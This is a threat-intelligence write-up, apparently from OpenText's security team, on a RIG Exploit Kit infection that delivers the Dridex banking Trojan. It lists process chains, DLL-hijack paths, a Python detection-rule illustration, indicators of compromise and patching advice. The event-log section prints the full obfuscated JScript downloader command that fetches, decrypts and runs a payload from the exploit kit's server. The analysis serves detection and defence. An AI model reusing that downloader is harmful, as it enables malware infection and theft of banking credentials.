The RIG Exploit Kit (EK), which was discovered in 2014, is known to exploit vulnerabilities in Microsoft's Internet Explorer browser and third-party applications such as Java, Adobe Flash, and Microsoft Silverlight. Browser exploits are rare nowadays; however, in March 2021 researchers discovered that the RIG EK had the ability to exploit CVE-2021-26411, a vulnerability affecting Microsoft Internet Explorer.
Dridex is a banking Trojan with the ability to steal banking credentials and other personal information in order to gain access to financial records. Recently, the researcher @nao_sec discovered that Dridex had switched its host-based infection techniques to bypass security and anti-virus vendor protections.
OpenText continually researches how exploit kits and other malware affect and interact with the endpoint in order to improve detection techniques. Below is an example of the tactics, techniques, and procedures (TTPs) OpenText observed during a recent RIG exploit and Dridex Trojan infection.
Initial infection chain – redirect to the RIG EK:
Shown above: Malicious domain using HTTP 302 to redirect to the RIG EK landing page
Shown above: IP address and URI string hosting the RIG EK along with partial exploit code
Shown above: Iexplore.exe interacting with cmd.exe to run the post exploit script
Shown above: Cmd.exe executing the dropped Dridex payload in the Local Temp directory to start the Dridex Trojan after the exploit
Shown above: Initial Dridex payload displaying the binary meta data
Shown above: Persistence is achieved via the creation of a Scheduled Task set to run at start-up and every 30 minutes.
Shown above: Dridex uses DLL (Dynamic Link Library) hijacking and process hollowing, which moves malicious DLLs and legitimate Windows binaries into the Local Temp or Roaming directories.
Shown above: Dridex Trojan IP and SSL Certificate seen during the process hollowing of Windows process spoolsv.exe
Tactics, Techniques, and Procedures (TTPs) observed during infection:
- Windows event logs showing the associated processes and command lines
ParentProcessName C:\Program Files (x86)\Internet Explorer\iexplore.exe
CommandLine cmd.exe /q /c cd /d “%tmp%” && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y[“set”+”Proxy”](n);y.open(“GET”,k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/[“Wait”+”ForResponse”]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e[“cha”+”rCodeAt”](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join(“”)};try{var u=WScript.Echo(),o=”Object”,A=Math,a=Function(“b”,”return WScript.Create”+o+”(b)”);P=(“”+WScript).split(” “)[1],M=”indexOf”,q=a(P+”ing.FileSystem”+o),m=WScript.Arguments,e=”WinHTTP”,Z=”cmd”,Q=a(“WinH”+”ttp.WinHttpRequest.5.1”),j=a(“W”+P+”.Shell”),s=a(“ADODB.Stream”),x=O(8)+”.”,p=”exe”,n=0,K=WScript[P+”FullName”],E=”.”+p;Y=”Type”;s[Y]=2;s.Charset=”iso-8859-1″;s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M](“PE\x00\x00″));s.WriteText(v);if(32-1^<d){var z=1;x+=”dll”}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x=”regsvr”+32+E+” /s “+x);j.run(Z+E+” /c “+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp “hj4ZytE5dZgd” “https://45.138.26.82/?MzkyNDk4&okTsKzUug&oa1n4=x33QcvWYaRuPCYjEM_jdSqRGPkzVGViIxo&s2ht4=2fn7DSHp2meCij07CeEAL3sF6WSR7V6vd-Ke1Tfwe0jiqDOQE4n9leTF5T8_GqzkLlyhKYhZOF-RaJYglH-5aRR7Vv3A72m7VFdMkjlRLU7WVTy-lJUVoT6Q4RmKnIEKWbrkJzB0FnVQvKKJojpUjGVyTYMjJwgfSLQ2Z22-3N8sc&kUTwcVNTgyNQ==” “2”” NewProcessName C:\Windows\SysWOW64\cmd.exe
ParentProcessName C:\Windows\SysWOW64\cmd.exe
CommandLine wsCripT //B //E:JScript 3.tMp “hj4ZytE5dZgd” “https://45.138.26.82/?MzkyNDk4&okTsKzUug&oa1n4=x33QcvWYaRuPCYjEM_jdSqRGPkzVGViIxo&s2ht4=2fn7DSHp2meCij07CeEAL3sF6WSR7V6vd-Ke1Tfwe0jiqDOQE4n9leTF5T8_GqzkLlyhKYhZOF-RaJYglH-5aRR7Vv3A72m7VFdMkjlRLU7WVTy-lJUVoT6Q4RmKnIEKWbrkJzB0FnVQvKKJojpUjGVyTYMjJwgfSLQ2Z22-3N8sc&kUTwcVNTgyNQ==” “2”” NewProcessName C:\Windows\SysWOW64\wscript.exe
ParentProcessName C:\Windows\SysWOW64\wscript.exe
CommandLine “C:\Windows\System32\cmd.exe” /c y0xyn.exe
NewProcessName C:\Windows\SysWOW64\cmd.exe
ParentProcessName C:\Windows\SysWOW64\cmd.exe
CommandLine y0xyn.exe
NewProcessName C:\Users\ROBERT~1.TOM\AppData\Local\Temp\y0xyn.exe
ParentProcessName C:\Users\ROBERT~1.TOM\AppData\Local\Temp\y0xyn.exe
CommandLine C:\Windows\system32\schtasks.exe /run /tn “Xjewnuamckmuzcr”
NewProcessName C:\Windows\System32\schtasks.exe
- Windows binaries observed being moved during the DLL hijacking process:
Parent Process: Explorer.exe
Path: C:\Users\[REDACTED]\AppData\Local\Tde\cmstp.exe
Path: C:\Users\[REDACTED]\AppData\Local\yth\Utilman.exe
Path: C:\Users\[REDACTED]\AppData\Local\9sXuqoY\cttune.exe
Path: C:\Users\[REDACTED]\AppData\Local\0sLDUDyo\wermgr.exe
Path: C:\Users\[REDACTED]\AppData\Local\xIjxwZ\msinfo32.exe
Path: C:\Users\[REDACTED]\AppData\Local\HBzY3Lo4\ddodiag.exe
Path: C:\Users\[REDACTED]\AppData\Roaming\Jhbyypvl\dvdupgrd.exe
Path: C:\Users\[REDACTED]\AppData\Local\LCffUor\StikyNot.exe
Path: C:\Users\[REDACTED]\AppData\Local\AqPAr1p0\bcastdvr.exe
Path: C:\Users\[REDACTED]\AppData\Local\hyWpwjovS\SysResetErr.exe
Path: C:\Users\[REDACTED]\AppData\Local\2eYtH4\LockScreenContentServer.exe
Path: C:\Users\[REDACTED]\AppData\Local\9I16g\AtBroker.exe
Path: C:\Users\[REDACTED]\AppData\Local\dlIR8aEB3\phoneactivate.exe
Path: C:\Users\[REDACTED]\AppData\Local\gHias\Dxpserver.exe
Path: C:\Users\[REDACTED]\AppData\Local\hpb1TE9\wextract.exe
Path: C:\Users\[REDACTED]\AppData\Local\w4eFILY3X\msdt.exe
Path: C:\Users\[REDACTED]\AppData\Local\qYd59E7v\CameraSettingsUIHost.exe
Path: C:\Users\[REDACTED]\AppData\Local\WWTL\isoburn.exe
Path: C:\Users\[REDACTED]\AppData\Local\AgNcSv4BT\bcastdvr.exe
Path: C:\Users\[REDACTED]\AppData\Local\WwQHiF3\RdpSaUacHelper.exe
Path: C:\Users\[REDACTED]\AppData\Local\pTBOO\rdpclip.exe
- Process hollowing observed being used to communicate with the command and control (C2) server:
Parent Process: Explorer.exe
Process Path: C:\Windows\system32\spoolsv.exe
Process CommandLine: C:\Windows\system32\spoolsv.exe
Parent Process: Explorer.exe
Process Path: C:\Windows\System32\svchost.exe
Process CommandLine: C:\Windows\System32\svchost.exe (NOTE: NO -k in the CommandLine)
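As an added illustration that is not part of OpenText's write-up, the Python below encodes each step of the chain above as a detection rule and runs it over constructed process-creation records shaped like the event log entries; the user name, drop directory and URL are made up, the obfuscated JScript is abbreviated, and the system-binary list is only a small subset.

```python
import re

# Constructed sample records shaped like the write-up's process-creation events. The obfuscated
# JScript is abbreviated to "{...}"; user name, drop directory and URL (203.0.113.10) are made up.
EVENTS = [
    {"parent": r"C:\Program Files (x86)\Internet Explorer\iexplore.exe",
     "cmd": r'cmd.exe /q /c cd /d "%tmp%" && echo function O(l){...} >3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "https://203.0.113.10/?x" "2"',
     "new": r"C:\Windows\SysWOW64\cmd.exe"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "https://203.0.113.10/?x" "2"',
     "new": r"C:\Windows\SysWOW64\wscript.exe"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe", "cmd": "y0xyn.exe",
     "new": r"C:\Users\bob\AppData\Local\Temp\y0xyn.exe"},
    {"parent": r"C:\Users\bob\AppData\Local\Temp\y0xyn.exe",
     "cmd": r'C:\Windows\system32\schtasks.exe /run /tn "Xjewnuamckmuzcr"',
     "new": r"C:\Windows\System32\schtasks.exe"},
    {"parent": r"C:\Windows\explorer.exe", "cmd": r"C:\Windows\System32\svchost.exe",
     "new": r"C:\Windows\System32\svchost.exe"},
    {"parent": r"C:\Windows\explorer.exe", "cmd": r"C:\Users\bob\AppData\Local\Tde\cmstp.exe",
     "new": r"C:\Users\bob\AppData\Local\Tde\cmstp.exe"},
    {"parent": r"C:\Windows\System32\services.exe",  # benign: svchost started normally, with -k
     "cmd": r"C:\Windows\System32\svchost.exe -k netsvcs", "new": r"C:\Windows\System32\svchost.exe"},
]
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
# A few of the relocated system binaries from the write-up; a real deployment would use a full list.
SYSTEM_BINS = {"cmstp.exe", "utilman.exe", "wermgr.exe", "msinfo32.exe", "msdt.exe", "rdpclip.exe"}
APPDATA = re.compile(r"\\appdata\\(local|roaming)\\", re.I)

def base(p): return p.rsplit("\\", 1)[-1].lower()   # file-name component, lower-cased

def scan(events):
    """Return (event_index, rule_name) pairs for records matching the observed chain."""
    hits = []
    for i, e in enumerate(events):
        parent, new, cmd = base(e["parent"]), base(e["new"]), e["cmd"].lower()
        if parent in BROWSERS and new in SHELLS:                   # iexplore.exe -> cmd.exe
            hits.append((i, "browser_spawned_shell"))
        if new == "wscript.exe" and re.search(r"//e:jscript\s+\S+\.tmp\b", cmd):
            hits.append((i, "wscript_jscript_engine_on_tmp"))      # forced engine on a .tMp file
        if "\\appdata\\local\\temp\\" in e["new"].lower():
            hits.append((i, "exe_run_from_user_temp"))             # y0xyn.exe in Local Temp
        if new == "schtasks.exe" and "/run" in cmd.split() and APPDATA.search(e["parent"]):
            hits.append((i, "schtasks_run_from_appdata_parent"))   # persistence task kicked off
        if new == "svchost.exe" and "-k" not in cmd.split():
            hits.append((i, "svchost_without_k"))                  # hollowed host, no service group
        if new in SYSTEM_BINS and APPDATA.search(e["new"]):
            hits.append((i, "system_binary_outside_windows_dir"))  # DLL-hijack staging copy
    return hits
```

Each rule on its own is noisy in a real estate; correlating several of them on one host within a short window is what makes the chain stand out.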
Indicators of compromise:
Rig EK:
ankltrafficexit.xyz/trafficexit – Redirect Domain to Rig EK landing page
45.138.26.82 – IP Hosting Rig EK
IP Addresses and Ports Associated with the Dridex Trojan C2:
Dridex Trojan binary and associated hash:
y0xyn.exe – Initial Dridex binary dropped by Rig EK
SHA-256 hash: e63628e1ea625d9363bd76e38a225fb78b4b70114ab97ee43b02b0fd68fc7176
If organizations are concerned that they have been affected by the RIG EK, OpenText recommends taking the following actions:
- Ensure browsers and plugins are up to date and patched
- Enable Protected Mode within Microsoft Internet Explorer browser
The OpenText Security Services team uses its extensive experience to identify an organization's security risks and works with them to keep systems protected, offering multiple services to address cyber security and privacy objectives. Contact us for more information.
Author: Lenny Conway, Lead Consultant